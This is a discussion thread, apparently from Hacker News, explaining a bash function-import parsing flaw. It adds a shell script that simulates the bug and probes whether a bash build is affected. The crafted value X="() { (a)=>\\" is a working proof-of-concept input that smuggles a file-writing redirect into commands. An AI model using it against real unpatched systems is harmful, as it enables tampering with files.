
Reproduced from other discussion thread

Try this slight variation:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  $ cat echo
  Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsed.

AFAICT (without digging deep into the code) that leaves ">\[NEWLINE]echo date" in the execution buffer, which gets treated the same as

  date > echo
It causes the command to be interpreted (executed) in a totally different way than it was supposed to, with the nice side effect of modifying files.

See one of my other comments for an example that uses the same flaw to read files.

I don't think anyone has found an RCE path for it yet though.




Thanks, that does entirely clear it up for me: I was missing the obvious (in hindsight):

Under normal circumstances:

  $ bash -c 'echo date'
  date
With this attack, it is not going to print out the actual date, but is actually executing something like

  date > echo
So what happens then as you and others demonstrated:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'

  $ cat echo
  Wed Sep 24 22:38:19 EDT 2014
"echo" is now a file in my current working dir. Definitely fishy business... the whole flip-flop of "echo date" to "date > echo" is so easy to miss.
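
The two comments above describe the mechanism (a stray ">\" left in the parse buffer, joined to the next line by backslash-newline continuation) and the symptom (a file named "echo" appearing in the working directory). The script below is an added example, not code from either commenter. It has two parts: the first feeds bash -c the exact leftover bytes ">\" NEWLINE "echo date" directly, so the rewrite to "date > echo" can be watched on any bash, patched or not; the second runs the actual environment-variable probe from the thread in a scratch directory and reports whether this bash's function importer still trips on it. Function names and return codes are this example's own conventions, and the second probe assumes that a bash which does not create the stray file is behaving correctly.

```shell
#!/usr/bin/env bash
# Added example, not from the HN thread. Demonstrates and probes the
# ">\" parser-leftover variant discussed above.

# Part 1: mechanism only. Builds the literal bytes  > \ NEWLINE e c h o SP d a t e
# and hands them to bash -c. Backslash-newline is a line continuation, so the
# command line collapses to ">echo date": run `date` with stdout redirected to
# a file called "echo". This works on every bash, because it is ordinary
# parsing, not the importer bug.
simulate_leftover_redirect() {
    local scratch leftover rc=0
    scratch="$(mktemp -d)" || return 2
    # printf turns '\\' into a backslash and '\n' into a newline.
    leftover="$(printf '>\\\necho date')"
    ( cd "$scratch" || exit 2
      bash -c "$leftover" || exit 1
      [ -s echo ] || exit 1               # the redirect target must exist and be non-empty
      printf 'file "echo" created; contents: %s\n' "$(cat echo)" ) || rc=$?
    rm -rf "$scratch"
    return "$rc"
}

# Part 2: the real probe, the same crafted value as in the thread, passed via
# the environment rather than `export` so the caller's environment stays clean.
# Returns 0 when no stray "echo" file appears (importer fixed, or the crafted
# value is no longer treated as a function), 1 when the file appears, 2 on a
# setup failure. The importer's syntax-error noise on stderr is discarded.
probe_function_import_leftover() {
    local bash_bin="${1:-bash}"
    local scratch rc=0
    scratch="$(mktemp -d)" || return 2
    ( cd "$scratch" || exit 2
      env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1
      [ ! -e echo ] || exit 1 ) || rc=$?
    rm -rf "$scratch"
    return "$rc"
}

# Usage: run both and print a verdict.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    simulate_leftover_redirect
    if probe_function_import_leftover "${1:-bash}"; then
        echo "importer probe: no stray file, this bash does not take the bait"
    else
        echo "importer probe: stray 'echo' file appeared, this bash is affected"
    fi
fi
```

The first function is the one to use when explaining the bug to someone who only has a patched bash at hand: it reproduces the "echo date" to "date > echo" flip without needing the vulnerable importer. The second is a quick local check; pass an alternative bash binary as the first argument to probe a specific build.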



